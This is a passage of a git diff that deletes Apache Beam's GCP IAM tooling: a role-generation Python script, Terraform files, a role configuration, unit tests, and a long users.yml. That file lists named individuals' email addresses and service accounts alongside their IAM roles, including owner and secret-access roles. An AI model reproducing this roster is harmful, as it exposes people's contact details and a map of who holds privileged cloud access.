iam_admin_v1.Permission.CustomRolesSupportLevel.SUPPORTED: - ga_perms.append(perm) - - permissions_cache[f"{project_id}-role"][role_name] = ga_perms - return ga_perms - except exceptions.NotFound: - print(f"Error: The role '{role_name}' was not found.") - return [] - except Exception as e: - print(f"An unexpected error occurred: {e}") - return [] - -def filter_permissions(permissions: list[str], allowed_prefixes: list[str] = [], denied_suffixes: list[str] = []) -> set[str]: - """ - Filters permissions based on the provided services. - - Args: - permissions: A list of permissions to filter. - allowed_prefixes: A list of strings that permissions must contain to be included. - denied_suffixes: A list of strings that permissions must not contain to be included. - Returns: - A list of permissions that match the specified services. - """ - - filtered_permissions = set() - - for perm in permissions: - if any(perm.startswith(prefix) for prefix in allowed_prefixes): - if not any(perm.endswith(suffix) for suffix in denied_suffixes): - filtered_permissions.add(perm) - - return filtered_permissions - -def generate_role(role_name: str , perms: set[str]) -> dict: - return { - "role_id": f"{role_name}", - "title": f"{role_name}", - "stage": "GA", - "description": f"This is the {role_name} role", - "permissions": sorted(list(perms)), - } - -def write_role_yaml(filename, role_data): - if not role_data.get("permissions"): - print(f"No permissions to write for {filename}. Skipping.") - return - with open(filename, "w") as f: - f.write(ASF_LICENSE_HEADER) - f.write(f"# This file was generated on {datetime.datetime.now(datetime.timezone.utc).strftime('%Y-%m-%d %H:%M:%S')} UTC\n\n") - yaml.dump(role_data, f, default_flow_style=False) - -def get_config(): - """ - Reads the roles configuration from the YAML file and returns it as a dictionary. - The configuration includes services, roles, and suffixes for filtering permissions. - """ - script_dir = os.path.dirname(os.path.abspath(__file__)) - config_path = os.path.join(script_dir, "roles_config.yaml") - with open(config_path, "r") as f: - config = yaml.safe_load(f) - - # Each role inherits permissions from the previous role. - # This means that the viewer role has all the permissions of the committer role, and so on. - # The roles are defined in the order of viewer, committer, infra_manager, and admin. - # The viewer role is the base role, so its file contains all its - - response = { - "project_id": config.get("project_id", "apache-beam-testing"), - "roles_prefix": config.get("roles_prefix", "beam"), - "role": {} - } - - # Add suffixes to the response - suffixes = {} - for suffix in config.get("suffixes", []): - suffixes[suffix["name"]] = suffix["values"] - - services = set() - roles = set() - - # Sort roles by hierarchy to ensure they are processed in the correct order. - config["roles"].sort(key=lambda x: int(x.get("hierarchy", 0))) - - for role in config["roles"]: - services.update(role.get("services", [])) - roles.update(role.get("roles", [])) - - response["role"][role["name"]] = { - "name": role["name"], - "description": role.get("description", f"This is the {role['name']} role"), - "services": services.copy(), - "roles": roles.copy(), - "except_suffixes": [], - } - - # If the role has except_suffixes, add them to the response - suffix_set = set() - for except_suffix in role.get("except_suffixes", []): - if except_suffix in suffixes: - suffix_set.update(suffixes[except_suffix]) - else: - raise ValueError(f"Unknown suffix '{except_suffix}' in role '{role['name']}'") - if suffix_set: - response["role"][role["name"]]["except_suffixes"] = list(suffix_set) - - return response - -def get_roles(): - """ - Generates the roles based on the predefined services and permissions. - This function creates roles for Beam Viewer, Committer, Infra Manager, and Admin. - It filters permissions based on the allowed and denied strings defined in the configuration. - """ - - config = get_config() - response = {} - - project_id = config["project_id"] - - permissions_added = set() - - for role in config["role"].values(): - print(f"Generating role: {config['roles_prefix']}_{role['name']} with services: {role['services']} and roles: {role['roles']}") - # Get the permissions for each base role. - role_permissions = set() - for role_name in role["roles"]: - role_permissions.update(get_role_permissions(role_name, project_id)) - role["permissions"] = filter_permissions( - permissions=list(role_permissions), - allowed_prefixes=list(role["services"]), - denied_suffixes=role.get("except_suffixes", []) - ) - # Remove already added permissions to avoid duplicates. - role["permissions"] = role["permissions"].difference(permissions_added) - permissions_added.update(role["permissions"]) - response[f"{config['roles_prefix']}_{role['name']}"] = generate_role(f"{config['roles_prefix']}_{role['name']}", role["permissions"]) - - return response - -def main(): - """ - Main function to generate the roles and write them to YAML files. - It creates a directory for the roles if it doesn't exist and writes each role to its respective file. - """ - - roles = get_roles() - - for role_name, role_data in roles.items(): - filename = f"{role_name}.role.yaml" - write_role_yaml(filename, role_data) - print(f"Generated {filename} with {len(role_data['permissions'])} permissions.") - -if __name__ == "__main__": - main() diff --git a/infra/iam/roles/roles.tf b/infra/iam/roles/roles.tf deleted file mode 100644 index d3348fa31b1e..000000000000 --- a/infra/iam/roles/roles.tf +++ /dev/null @@ -1,45 +0,0 @@ -# -# Licensed to the Apache Software Foundation (ASF) under one or more -# contributor license agreements. See the NOTICE file distributed with -# this work for additional information regarding copyright ownership. -# The ASF licenses this file to You under the Apache License, Version 2.0 -# (the "License"); you may not use this file except in compliance with -# the License. You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# - -# This Terraform configuration file is used to manage custom IAM roles -# in a Google Cloud Platform (GCP) project. It reads role definitions -# from YAML files located in the same directory and creates custom roles -# in the specified GCP project. - -locals { - role_files = fileset(path.module, "*.role.yaml") - roles_data = { - for f in local.role_files : - trimsuffix(f, ".role.yaml") => yamldecode(file("${path.module}/${f}")) - } -} - -variable "project_id" { - description = "The GCP project ID." - type = string -} - -resource "google_project_iam_custom_role" "custom_roles" { - for_each = local.roles_data - - project = var.project_id - role_id = each.value.role_id - title = each.value.title - description = lookup(each.value, "description", null) - permissions = each.value.permissions - stage = lookup(each.value, "stage", "GA") -} diff --git a/infra/iam/roles/roles_config.yaml b/infra/iam/roles/roles_config.yaml deleted file mode 100644 index 1e94cdc2ccbd..000000000000 --- a/infra/iam/roles/roles_config.yaml +++ /dev/null @@ -1,150 +0,0 @@ -# -# Licensed to the Apache Software Foundation (ASF) under one or more -# contributor license agreements. See the NOTICE file distributed with -# this work for additional information regarding copyright ownership. -# The ASF licenses this file to You under the Apache License, Version 2.0 -# (the "License"); you may not use this file except in compliance with -# the License. You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -# Configuration for Apache Beam roles in GCP. -# This file defines the roles, their hierarchy, the services they can access and the roles they inherit from. - -project-id: "apache-beam-testing" # Default project ID for Apache Beam in GCP. -roles-prefix: "beam" # Prefix for the roles generated by this configuration. - -# Each custom role is defined here. -# name: The name of the role. -# hierarchy: The hierarchy level of the role, lower numbers indicate fewer permissions, -# the higher hierarchy level also gets the permissions of lower hierarchy levels. -# description: A brief description of the role. -# services: The list of services that the role can access. -# roles: The list of base roles that this role inherits permissions from. -# except_suffixes: A list of suffixes that indicate permissions that should not be included in the role. -# The suffixes are defined in the `suffixes` section below. -roles: - - name: viewer - hierarchy: 0 - description: "Viewer role for Apache Beam in GCP, it has read-only access to all services used by Beam." - services: - - artifactregistry - - biglake - - bigquery - - cloudasset - - cloudbuild - - cloudfunctions - - cloudsql - - compute - - container - - dataflow - - dataproc - - datastore - - dns - - firebase - - iam - - iap - - meshconfig - - monitoring - - pubsub - - redis - - resourcemanager - - secretmanager - - servicemanagement - - serviceusage - - spanner - - storage - - trafficdirector - roles: - - roles/viewer - except_suffixes: - - destructive - - name: writer - description: "Writer role for Apache Beam in GCP, it has additional permissions for managing resources." - hierarchy: 1 - services: - - cloudkms - - dataform - - dataplex - roles: - - roles/viewer - - roles/bigquery.user - - roles/bigquery.dataViewer - - roles/cloudsql.instanceUser - - roles/container.clusterViewer - - roles/container.developer - - roles/compute.networkViewer - - roles/datastore.user - - roles/trafficdirector.client - except_suffixes: - - destructive - - name: infra_manager - description: "Infrastructure Manager role for Apache Beam in GCP, it has permissions for managing infrastructure resources but not for destructive actions." - hierarchy: 2 - services: [] - roles: - - roles/cloudbuild.builds.editor - - roles/iam.serviceAccountTokenCreator - - roles/iam.serviceAccountUser - - roles/storage.objectCreator - - roles/storage.objectViewer - - roles/editor - except_suffixes: - - destructive - - name: admin - description: "Admin role for Apache Beam in GCP, it has permissions for managing all services used by Beam, it can perform destructive actions and access secrets." - hierarchy: 3 - services: - - secretmanager - roles: - - roles/editor - - roles/artifactregistry.admin - - roles/biglake.admin - - roles/bigquery.admin - - roles/cloudfunctions.admin - - roles/compute.admin - - roles/compute.instanceAdmin.v1 - - roles/compute.networkAdmin - - roles/container.admin - - roles/dataflow.admin - - roles/dataproc.admin - - roles/datastore.indexAdmin - - roles/dns.admin - - roles/firebase.admin - - roles/iam.roleAdmin - - roles/iam.securityAdmin - - roles/iam.serviceAccountAdmin - - roles/iam.workloadIdentityPoolAdmin - - roles/meshconfig.admin - - roles/monitoring.admin - - roles/pubsub.admin - - roles/redis.admin - - roles/resourcemanager.projectIamAdmin - - roles/secretmanager.admin - - roles/secretmanager.secretAccessor - - roles/secretmanager.viewer - - roles/servicemanagement.quotaAdmin - - roles/serviceusage.serviceUsageAdmin - - roles/spanner.admin - - roles/spanner.databaseAdmin - - roles/storage.admin - - roles/storage.objectAdmin - except_suffixes: [] - -suffixes: - - name: destructive - description: "Suffixes that indicate destructive actions in GCP." - values: - - ".delete" - - ".remove" - - ".destroy" - - ".purge" - - ".cancel" - - ".stop" - - ".terminate" diff --git a/infra/iam/roles/test_generate_roles.py b/infra/iam/roles/test_generate_roles.py deleted file mode 100644 index f5ebc5948e7c..000000000000 --- a/infra/iam/roles/test_generate_roles.py +++ /dev/null @@ -1,82 +0,0 @@ -# -# Licensed to the Apache Software Foundation (ASF) under one or more -# contributor license agreements. See the NOTICE file distributed with -# this work for additional information regarding copyright ownership. -# The ASF licenses this file to You under the Apache License, Version 2.0 -# (the "License"); you may not use this file except in compliance with -# the License. You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - - # Tests for generate_roles.py - -import unittest -from unittest.mock import MagicMock -import sys -import types -import generate_roles - -# Patch yaml and google.cloud imports before importing the script -sys.modules['yaml'] = MagicMock() -sys.modules['google.cloud'] = types.SimpleNamespace(iam_admin_v1=MagicMock()) -sys.modules['google.api_core'] = types.SimpleNamespace(exceptions=MagicMock()) - -class TestGenerateRoles(unittest.TestCase): - def test_filter_permissions(self): - perms = [ - 'compute.instances.create', - 'compute.instances.delete', - 'storage.buckets.create', - 'storage.buckets.delete', - 'storage.objects.get', - 'bigquery.tables.get', - 'bigquery.tables.delete', - ] - allowed = ['storage', 'bigquery'] - denied = ['delete'] - filtered = generate_roles.filter_permissions(perms, allowed, denied) - self.assertIn('storage.buckets.create', filtered) - self.assertIn('storage.objects.get', filtered) - self.assertIn('bigquery.tables.get', filtered) - self.assertNotIn('storage.buckets.delete', filtered) - self.assertNotIn('bigquery.tables.delete', filtered) - self.assertNotIn('compute.instances.create', filtered) - self.assertNotIn('compute.instances.delete', filtered) - - def test_generate_role(self): - perms = {'a.b.c', 'd.e.f'} - role = generate_roles.generate_role('test_role', perms) - self.assertEqual(role['role_id'], 'test_role') - self.assertEqual(role['title'], 'test_role') - self.assertEqual(role['stage'], 'GA') - self.assertIn('a.b.c', role['permissions']) - self.assertIn('d.e.f', role['permissions']) - - def test_write_role_yaml(self): - import tempfile - import os - role_data = { - 'role_id': 'test_role', - 'title': 'test_role', - 'stage': 'GA', - 'description': 'desc', - 'permissions': ['a.b.c', 'd.e.f'], - } - with tempfile.TemporaryDirectory() as tmpdir: - filename = os.path.join(tmpdir, 'role.yaml') - generate_roles.ASF_LICENSE_HEADER = '' # Avoid header for test - generate_roles.write_role_yaml(filename, role_data) - with open(filename) as f: - content = f.read() - self.assertIn('role_id', content) - self.assertIn('a.b.c', content) - self.assertIn('d.e.f', content) - -if __name__ == '__main__': - unittest.main() diff --git a/infra/iam/users.tf b/infra/iam/users.tf deleted file mode 100644 index 98be78fd8ce2..000000000000 --- a/infra/iam/users.tf +++ /dev/null @@ -1,61 +0,0 @@ -# -# Licensed to the Apache Software Foundation (ASF) under one or more -# contributor license agreements. See the NOTICE file distributed with -# this work for additional information regarding copyright ownership. -# The ASF licenses this file to You under the Apache License, Version 2.0 -# (the "License"); you may not use this file except in compliance with -# the License. You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# - -# This Terraform configuration file is used to manage users in a Google Cloud Platform (GCP) project. -# It reads user definitions from a YAML file (`users.yml`) and configures the corresponding IAM -# roles and permissions for each user in the specified GCP project. - -locals { - users = yamldecode(file("${path.module}/users.yml")) - - user_permissions = flatten([ - for user in (local.users == null ? [] : local.users) : [ - for perm in (user.permissions == null ? [] : user.permissions) : - { - username = user.username - email = user.email - member_type = user.member_type - role = replace(perm.role, "PROJECT-ID", var.project_id) - title = lookup(perm, "title", null) - description = lookup(perm, "description", null) - request_description = lookup(perm, "request_description", null) - expiry_date = lookup(perm, "expiry_date", null) - # Owner roles need to be handled separately, they require the user - # to accept their assignment. - } if perm != null && lookup(perm, "role", null) != null && perm.role != "roles/owner" - ] - ]) -} - -resource "google_project_iam_member" "project_members" { - for_each = { - for up in local.user_permissions : "${up.email}-${up.role}" => up - } - project = var.project_id - role = each.value.role - member = "${each.value.member_type}:${each.value.email}" - - dynamic "condition" { - # Condition is only created if expiry_date is set - for_each = each.value.expiry_date != null && each.value.expiry_date != "" ? [true] : [] - content { - title = "${each.value.title}" - description = "${each.value.description}" - expression = "request.time < timestamp('${each.value.expiry_date}T00:00:00Z')" - } - } -} diff --git a/infra/iam/users.yml b/infra/iam/users.yml deleted file mode 100644 index adfc086ec9be..000000000000 --- a/infra/iam/users.yml +++ /dev/null @@ -1,1237 +0,0 @@ -# Licensed to the Apache Software Foundation (ASF) under one or more -# contributor license agreements. See the NOTICE file distributed with -# this work for additional information regarding copyright ownership. -# The ASF licenses this file to You under the Apache License, Version 2.0 -# (the "License"); you may not use this file except in compliance with -# the License. You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -# IAM policy for project apache-beam-testing -# Generated on 2025-10-09 19:30:30 UTC - -- username: WhatWouldAustinDo - email: WhatWouldAustinDo@gmail.com - member_type: user - permissions: - - role: roles/editor -- username: aaronleeiv - email: aaronleeiv@google.com - member_type: user - permissions: - - role: roles/editor -- username: abbymotley - email: abbymotley@google.com - member_type: user - permissions: - - role: roles/viewer -- username: abdelrahman.ibrahim - email: abdelrahman.ibrahim@akvelon.us - member_type: user - permissions: - - role: roles/bigquery.admin - - role: roles/container.admin - - role: roles/editor - - role: roles/iam.serviceAccountUser - - role: roles/secretmanager.admin - - role: roles/storage.objectAdmin - - role: roles/storage.objectCreator -- username: adudko-runner-gke-sa - email: adudko-runner-gke-sa@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/container.admin - - role: roles/container.clusterAdmin - - role: roles/dataflow.admin - - role: roles/iam.serviceAccountTokenCreator - - role: roles/iam.serviceAccountUser -- username: ahmedabualsaud - email: ahmedabualsaud@google.com - member_type: user - permissions: - - role: roles/biglake.admin - - role: roles/editor - - role: roles/owner -- username: akarys.akvelon - email: akarys.akvelon@gmail.com - member_type: user - permissions: - - role: roles/bigquery.admin - - role: roles/container.admin - - role: roles/editor - - role: roles/secretmanager.secretAccessor -- username: aleks-vm-sa - email: aleks-vm-sa@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/artifactregistry.writer - - role: roles/bigquery.admin -- username: aleksandr.dudko - email: aleksandr.dudko@akvelon.com - member_type: user - permissions: - - role: roles/viewer -- username: alex.kosolapov - email: alex.kosolapov@akvelon.com - member_type: user - permissions: - - role: roles/viewer -- username: alexey.inkin - email: alexey.inkin@akvelon.com - member_type: user - permissions: - - role: roles/viewer -- username: allows-impersonation - email: allows-impersonation@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: organizations/433637338589/roles/GceStorageAdmin - - role: organizations/433637338589/roles/GcsBucketOwner - - role: roles/editor - - role: roles/file.editor - - role: roles/iam.serviceAccountTokenCreator - - role: roles/iam.serviceAccountUser - - role: roles/iam.workloadIdentityUser - - role: roles/storage.objectAdmin - - role: roles/viewer -- username: allows-impersonation-new - email: allows-impersonation-new@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: organizations/433637338589/roles/GcsBucketOwner - - role: roles/dataflow.admin - - role: roles/iam.serviceAccountTokenCreator - - role: roles/iam.serviceAccountUser -- username: altay - email: altay@google.com - member_type: user - permissions: - - role: roles/owner - - role: roles/viewer -- username: anandinguva - email: anandinguva@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/dataflow.admin -- username: anandinguva - email: anandinguva@google.com - member_type: user - permissions: - - role: roles/editor -- username: andres.vervaecke - email: andres.vervaecke@ml6.eu - member_type: user - permissions: - - role: roles/viewer -- username: andrey.devyatkin - email: andrey.devyatkin@akvelon.com - member_type: user - permissions: - - role: roles/cloudsql.instanceUser - - role: roles/dataflow.admin - - role: roles/iam.serviceAccountAdmin - - role: roles/owner - - role: roles/storage.admin -- username: andreydevyatkin-runner-gke-sa - email: andreydevyatkin-runner-gke-sa@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/container.admin - - role: roles/dataflow.admin - - role: roles/iam.serviceAccountTokenCreator - - role: roles/iam.serviceAccountUser -- username: anikin - email: anikin@google.com - member_type: user - permissions: - - role: roles/editor -- username: apache-beam-testing - email: apache-beam-testing@appspot.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/editor -- username: apache-beam-testing-klk - email: apache-beam-testing-klk@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/editor -- username: apache-beam-testing-looker-admins - email: apache-beam-testing-looker-admins@google.com - member_type: group - permissions: - - role: roles/looker.admin -- username: apache-beam-testing-looker-users - email: apache-beam-testing-looker-users@google.com - member_type: group - permissions: - - role: roles/looker.instanceUser -- username: apanich - email: apanich@google.com - member_type: user - permissions: - - role: roles/editor -- username: archbtw - email: archbtw@google.com - member_type: user - permissions: - - role: roles/editor -- username: arne.vandendorpe - email: arne.vandendorpe@ml6.eu - member_type: user - permissions: - - role: roles/viewer -- username: aroraarnav - email: aroraarnav@google.com - member_type: user - permissions: - - role: roles/owner -- username: asfgnome - email: asfgnome@gmail.com - member_type: user - permissions: - - role: roles/owner -- username: ashokrd2 - email: ashokrd2@gmail.com - member_type: user - permissions: - - role: roles/editor -- username: auth-example - email: auth-example@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/artifactregistry.reader -- username: beam-github-actions - email: beam-github-actions@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/artifactregistry.createOnPushWriter - - role: roles/artifactregistry.reader - - role: roles/artifactregistry.writer - - role: roles/autoscaling.metricsWriter - - role: roles/bigquery.dataEditor - - role: roles/bigtable.admin - - role: roles/cloudfunctions.invoker - - role: roles/compute.viewer - - role: roles/container.serviceAgent - - role: roles/dataflow.admin - - role: roles/dataflow.developer - - role: roles/dataproc.editor - - role: roles/editor - - role: roles/healthcare.fhirResourceEditor - - role: roles/healthcare.fhirStoreAdmin - - role: roles/iam.roleAdmin - - role: roles/iam.serviceAccountTokenCreator - - role: roles/iam.serviceAccountUser - - role: roles/logging.logWriter - - role: roles/managedkafka.admin - - role: roles/managedkafka.client - - role: roles/managedkafka.schemaRegistryEditor - - role: roles/monitoring.metricWriter - - role: roles/monitoring.viewer - - role: roles/resourcemanager.projectIamAdmin - - role: roles/secretmanager.admin - - role: roles/spanner.databaseAdmin - - role: roles/stackdriver.resourceMetadata.writer - - role: roles/storage.admin -- username: beam-github-actions-k8-nodes - email: beam-github-actions-k8-nodes@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/artifactregistry.reader - - role: roles/container.nodeServiceAccount - - role: roles/storage.objectViewer -- username: beam-interns - email: beam-interns@google.com - member_type: group - permissions: - - role: roles/bigquery.jobUser - - role: roles/dataflow.developer - - role: roles/iam.serviceAccountUser - - role: roles/serviceusage.serviceUsageConsumer -- username: beam-metrics-posgresql-kube - email: beam-metrics-posgresql-kube@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/cloudsql.client -- username: beam-testing-dmartin-api-token - email: beam-testing-dmartin-api-token@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/cloudfunctions.invoker -- username: beam-wheels-github - email: beam-wheels-github@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/aiplatform.user - - role: roles/artifactregistry.admin - - role: roles/artifactregistry.createOnPushWriter - - role: roles/bigquery.admin - - role: roles/bigquery.dataEditor - - role: roles/bigtable.admin - - role: roles/bigtable.user - - role: roles/container.admin - - role: roles/dataflow.admin - - role: roles/healthcare.fhirResourceEditor - - role: roles/healthcare.fhirStoreAdmin - - role: roles/iam.serviceAccountTokenCreator - - role: roles/iam.serviceAccountUser - - role: roles/pubsub.admin - - role: roles/secretmanager.admin - - role: roles/spanner.admin - - role: roles/storage.admin - - role: roles/storage.folderAdmin - - role: roles/viewer -- username: bigquery-admin - email: bigquery-admin@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/bigquery.admin -- username: bigquery-reader - email: bigquery-reader@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/bigquery.dataViewer - - role: roles/bigquery.jobUser -- username: bjornpedersen - email: bjornpedersen@google.com - member_type: user - permissions: - - role: roles/viewer -- username: bvolpato - email: bvolpato@google.com - member_type: user - permissions: - - role: roles/viewer -- username: byronellis - email: byronellis@google.com - member_type: user - permissions: - - role: roles/viewer -- username: ccychenzo - email: ccychenzo@gmail.com - member_type: user - permissions: - - role: roles/editor -- username: chamikara - email: chamikara@google.com - member_type: user - permissions: - - role: roles/owner -- username: chamikara-sa - email: chamikara-sa@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/editor -- username: cloud-data-workflow-dev - email: cloud-data-workflow-dev@prod.google.com - member_type: user - permissions: - - role: roles/compute.instanceAdmin.v1 - - role: roles/compute.networkViewer - - role: roles/meshconfig.admin - - role: roles/storage.objectAdmin - - role: roles/trafficdirector.client -- username: cloud-dataflow-templates-team - email: cloud-dataflow-templates-team@twosync.google.com - member_type: group - permissions: - - role: roles/managedkafka.admin - - role: roles/viewer -- username: cvandermerwe - email: cvandermerwe@google.com - member_type: user - permissions: - - role: roles/compute.networkAdmin - - role: roles/editor -- username: damondouglas - email: damondouglas@google.com - member_type: user - permissions: - - role: roles/editor - - role: roles/owner -- username: dannymccormick - email: dannymccormick@google.com - member_type: user - permissions: - - role: roles/bigquery.dataOwner - - role: roles/container.admin - - role: roles/iam.serviceAccountUser - - role: roles/owner - - role: roles/resourcemanager.projectIamAdmin -- username: dataflow-ml-starter - email: dataflow-ml-starter@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/editor - - role: roles/iam.serviceAccountTokenCreator -- username: datapls-plat-team - email: datapls-plat-team@google.com - member_type: group - permissions: - - role: roles/looker.instanceUser - - role: roles/viewer -- username: datapls-team - email: datapls-team@google.com - member_type: group - permissions: - - role: roles/looker.instanceUser -- username: datapls-unified-worker - email: datapls-unified-worker@google.com - member_type: group - permissions: - - role: roles/looker.instanceUser -- username: dcrhodes - email: dcrhodes@google.com - member_type: user - permissions: - - role: roles/bigquery.dataViewer - - role: roles/bigquery.user -- username: deepchowdhury - email: deepchowdhury@google.com - member_type: user - permissions: - - role: roles/viewer -- username: derrickaw - email: derrickaw@google.com - member_type: user - permissions: - - role: roles/editor -- username: dippatel - email: dippatel@google.com - member_type: user - permissions: - - role: roles/editor - - role: roles/resourcemanager.projectIamAdmin - - role: roles/spanner.admin -- username: dippatel - email: dippatel@prod.google.com - member_type: user - permissions: - - role: roles/editor - - role: roles/iam.serviceAccountTokenCreator -- username: djagaluru - email: djagaluru@google.com - member_type: user - permissions: - - role: roles/viewer -- username: djerek.vlado6 - email: djerek.vlado6@gmail.com - member_type: user - permissions: - - role: organizations/433637338589/roles/GceStorageAdmin - - role: roles/cloudfunctions.admin - - role: roles/container.admin - - role: roles/dataproc.admin - - role: roles/editor - - role: roles/secretmanager.secretAccessor -- username: dpcollins - email: dpcollins@google.com - member_type: user - permissions: - - role: roles/viewer -- username: ellading - email: ellading@google.com - member_type: user - permissions: - - role: roles/editor -- username: enriquecaol04 - email: enriquecaol04@gmail.com - member_type: user - permissions: - - role: roles/viewer -- username: eventarc-workflow-sa - email: eventarc-workflow-sa@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/eventarc.eventReceiver - - role: roles/pubsub.publisher - - role: roles/workflows.invoker -- username: firebase-adminsdk-dpfsw - email: firebase-adminsdk-dpfsw@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/firebase.sdkAdminServiceAgent - - role: roles/firebaseauth.admin - - role: roles/iam.serviceAccountTokenCreator -- username: fozzie - email: fozzie@google.com - member_type: user - permissions: - - role: roles/owner -- username: francisohara - email: francisohara@google.com - member_type: user - permissions: - - role: roles/bigquery.user - - role: roles/dataflow.admin - - role: roles/iam.serviceAccountTokenCreator - - role: roles/iam.serviceAccountUser -- username: giomar.osorio - email: giomar.osorio@wizeline.com - member_type: user - permissions: - - role: roles/editor -- username: github-self-hosted-runners - email: github-self-hosted-runners@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/artifactregistry.reader - - role: roles/cloudfunctions.invoker - - role: roles/iam.serviceAccountTokenCreator - - role: roles/storage.objectViewer -- username: harrisonlim - email: harrisonlim@google.com - member_type: user - permissions: - - role: roles/editor -- username: hejia - email: hejia@google.com - member_type: user - permissions: - - role: roles/iam.securityReviewer - - role: roles/viewer -- username: impersonation-dataflow-worker - email: impersonation-dataflow-worker@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: organizations/433637338589/roles/GcsBucketOwner - - role: roles/dataflow.admin - - role: roles/dataflow.worker -- username: infra-pipelines-worker - email: infra-pipelines-worker@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/artifactregistry.reader - - role: roles/bigquery.readSessionUser - - role: roles/bigquery.user - - role: roles/dataflow.viewer - - role: roles/dataflow.worker - - role: roles/managedkafka.client - - role: roles/pubsub.subscriber - - role: roles/pubsub.viewer - - role: roles/storage.admin -- username: jasper.van.den.bossche - email: jasper.van.den.bossche@ml6.eu - member_type: user - permissions: - - role: roles/editor -- username: jeffreylwang - email: jeffreylwang@google.com - member_type: user - permissions: - - role: roles/editor -- username: jkinard - email: jkinard@google.com - member_type: user - permissions: - - role: roles/editor -- username: johnjcasey - email: johnjcasey@google.com - member_type: user - permissions: - - role: roles/editor - - role: roles/owner -- username: joseinigo - email: joseinigo@google.com - member_type: user - permissions: - - role: roles/editor -- username: jrmccluskey - email: jrmccluskey@google.com - member_type: user - permissions: - - role: roles/editor - - role: roles/owner -- username: k.loyola.gutierrez - email: k.loyola.gutierrez@akvelon.com - member_type: user - permissions: - - role: roles/container.admin - - role: roles/editor -- username: kenn - email: kenn@apache.org - member_type: user - permissions: - - role: roles/owner -- username: kerrydc - email: kerrydc@google.com - member_type: user - permissions: - - role: roles/cloudasset.owner - - role: roles/dataflow.admin - - role: roles/owner - - role: roles/resourcemanager.projectIamAdmin -- username: klk - email: klk@google.com - member_type: user - permissions: - - role: roles/editor - - role: roles/owner -- username: kmj - email: kmj@google.com - member_type: user - permissions: - - role: roles/bigquery.user -- username: lahariguduru - email: lahariguduru@google.com - member_type: user - permissions: - - role: roles/bigquery.user - - role: roles/dataflow.admin - - role: roles/iam.serviceAccountTokenCreator - - role: roles/iam.serviceAccountUser -- username: limatthew - email: limatthew@google.com - member_type: user - permissions: - - role: roles/viewer -- username: maggiejz - email: maggiejz@google.com - member_type: user - permissions: - - role: roles/editor -- username: manavgarg - email: manavgarg@google.com - member_type: user - permissions: - - role: roles/editor -- username: meetsea - email: meetsea@google.com - member_type: user - permissions: - - role: roles/editor -- username: mock-apis-64xjw9 - email: mock-apis-64xjw9@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/logging.logWriter -- username: naireenhussain - email: naireenhussain@google.com - member_type: user - permissions: - - role: roles/editor -- username: nickllx - email: nickllx@google.com - member_type: user - permissions: - - role: roles/editor -- username: oleg.borisevich - email: oleg.borisevich@akvelon.com - member_type: user - permissions: - - role: roles/cloudbuild.builds.editor - - role: roles/cloudfunctions.admin - - role: roles/compute.admin - - role: roles/container.clusterViewer - - role: roles/container.developer - - role: roles/datastore.user - - role: roles/firebase.admin - - role: roles/iam.securityAdmin - - role: roles/iam.serviceAccountCreator - - role: roles/iam.serviceAccountUser - - role: roles/monitoring.admin - - role: roles/secretmanager.admin - - role: roles/secretmanager.secretAccessor - - role: roles/secretmanager.viewer - - role: roles/serviceusage.serviceUsageAdmin - - role: roles/storage.admin -- username: pabloem - 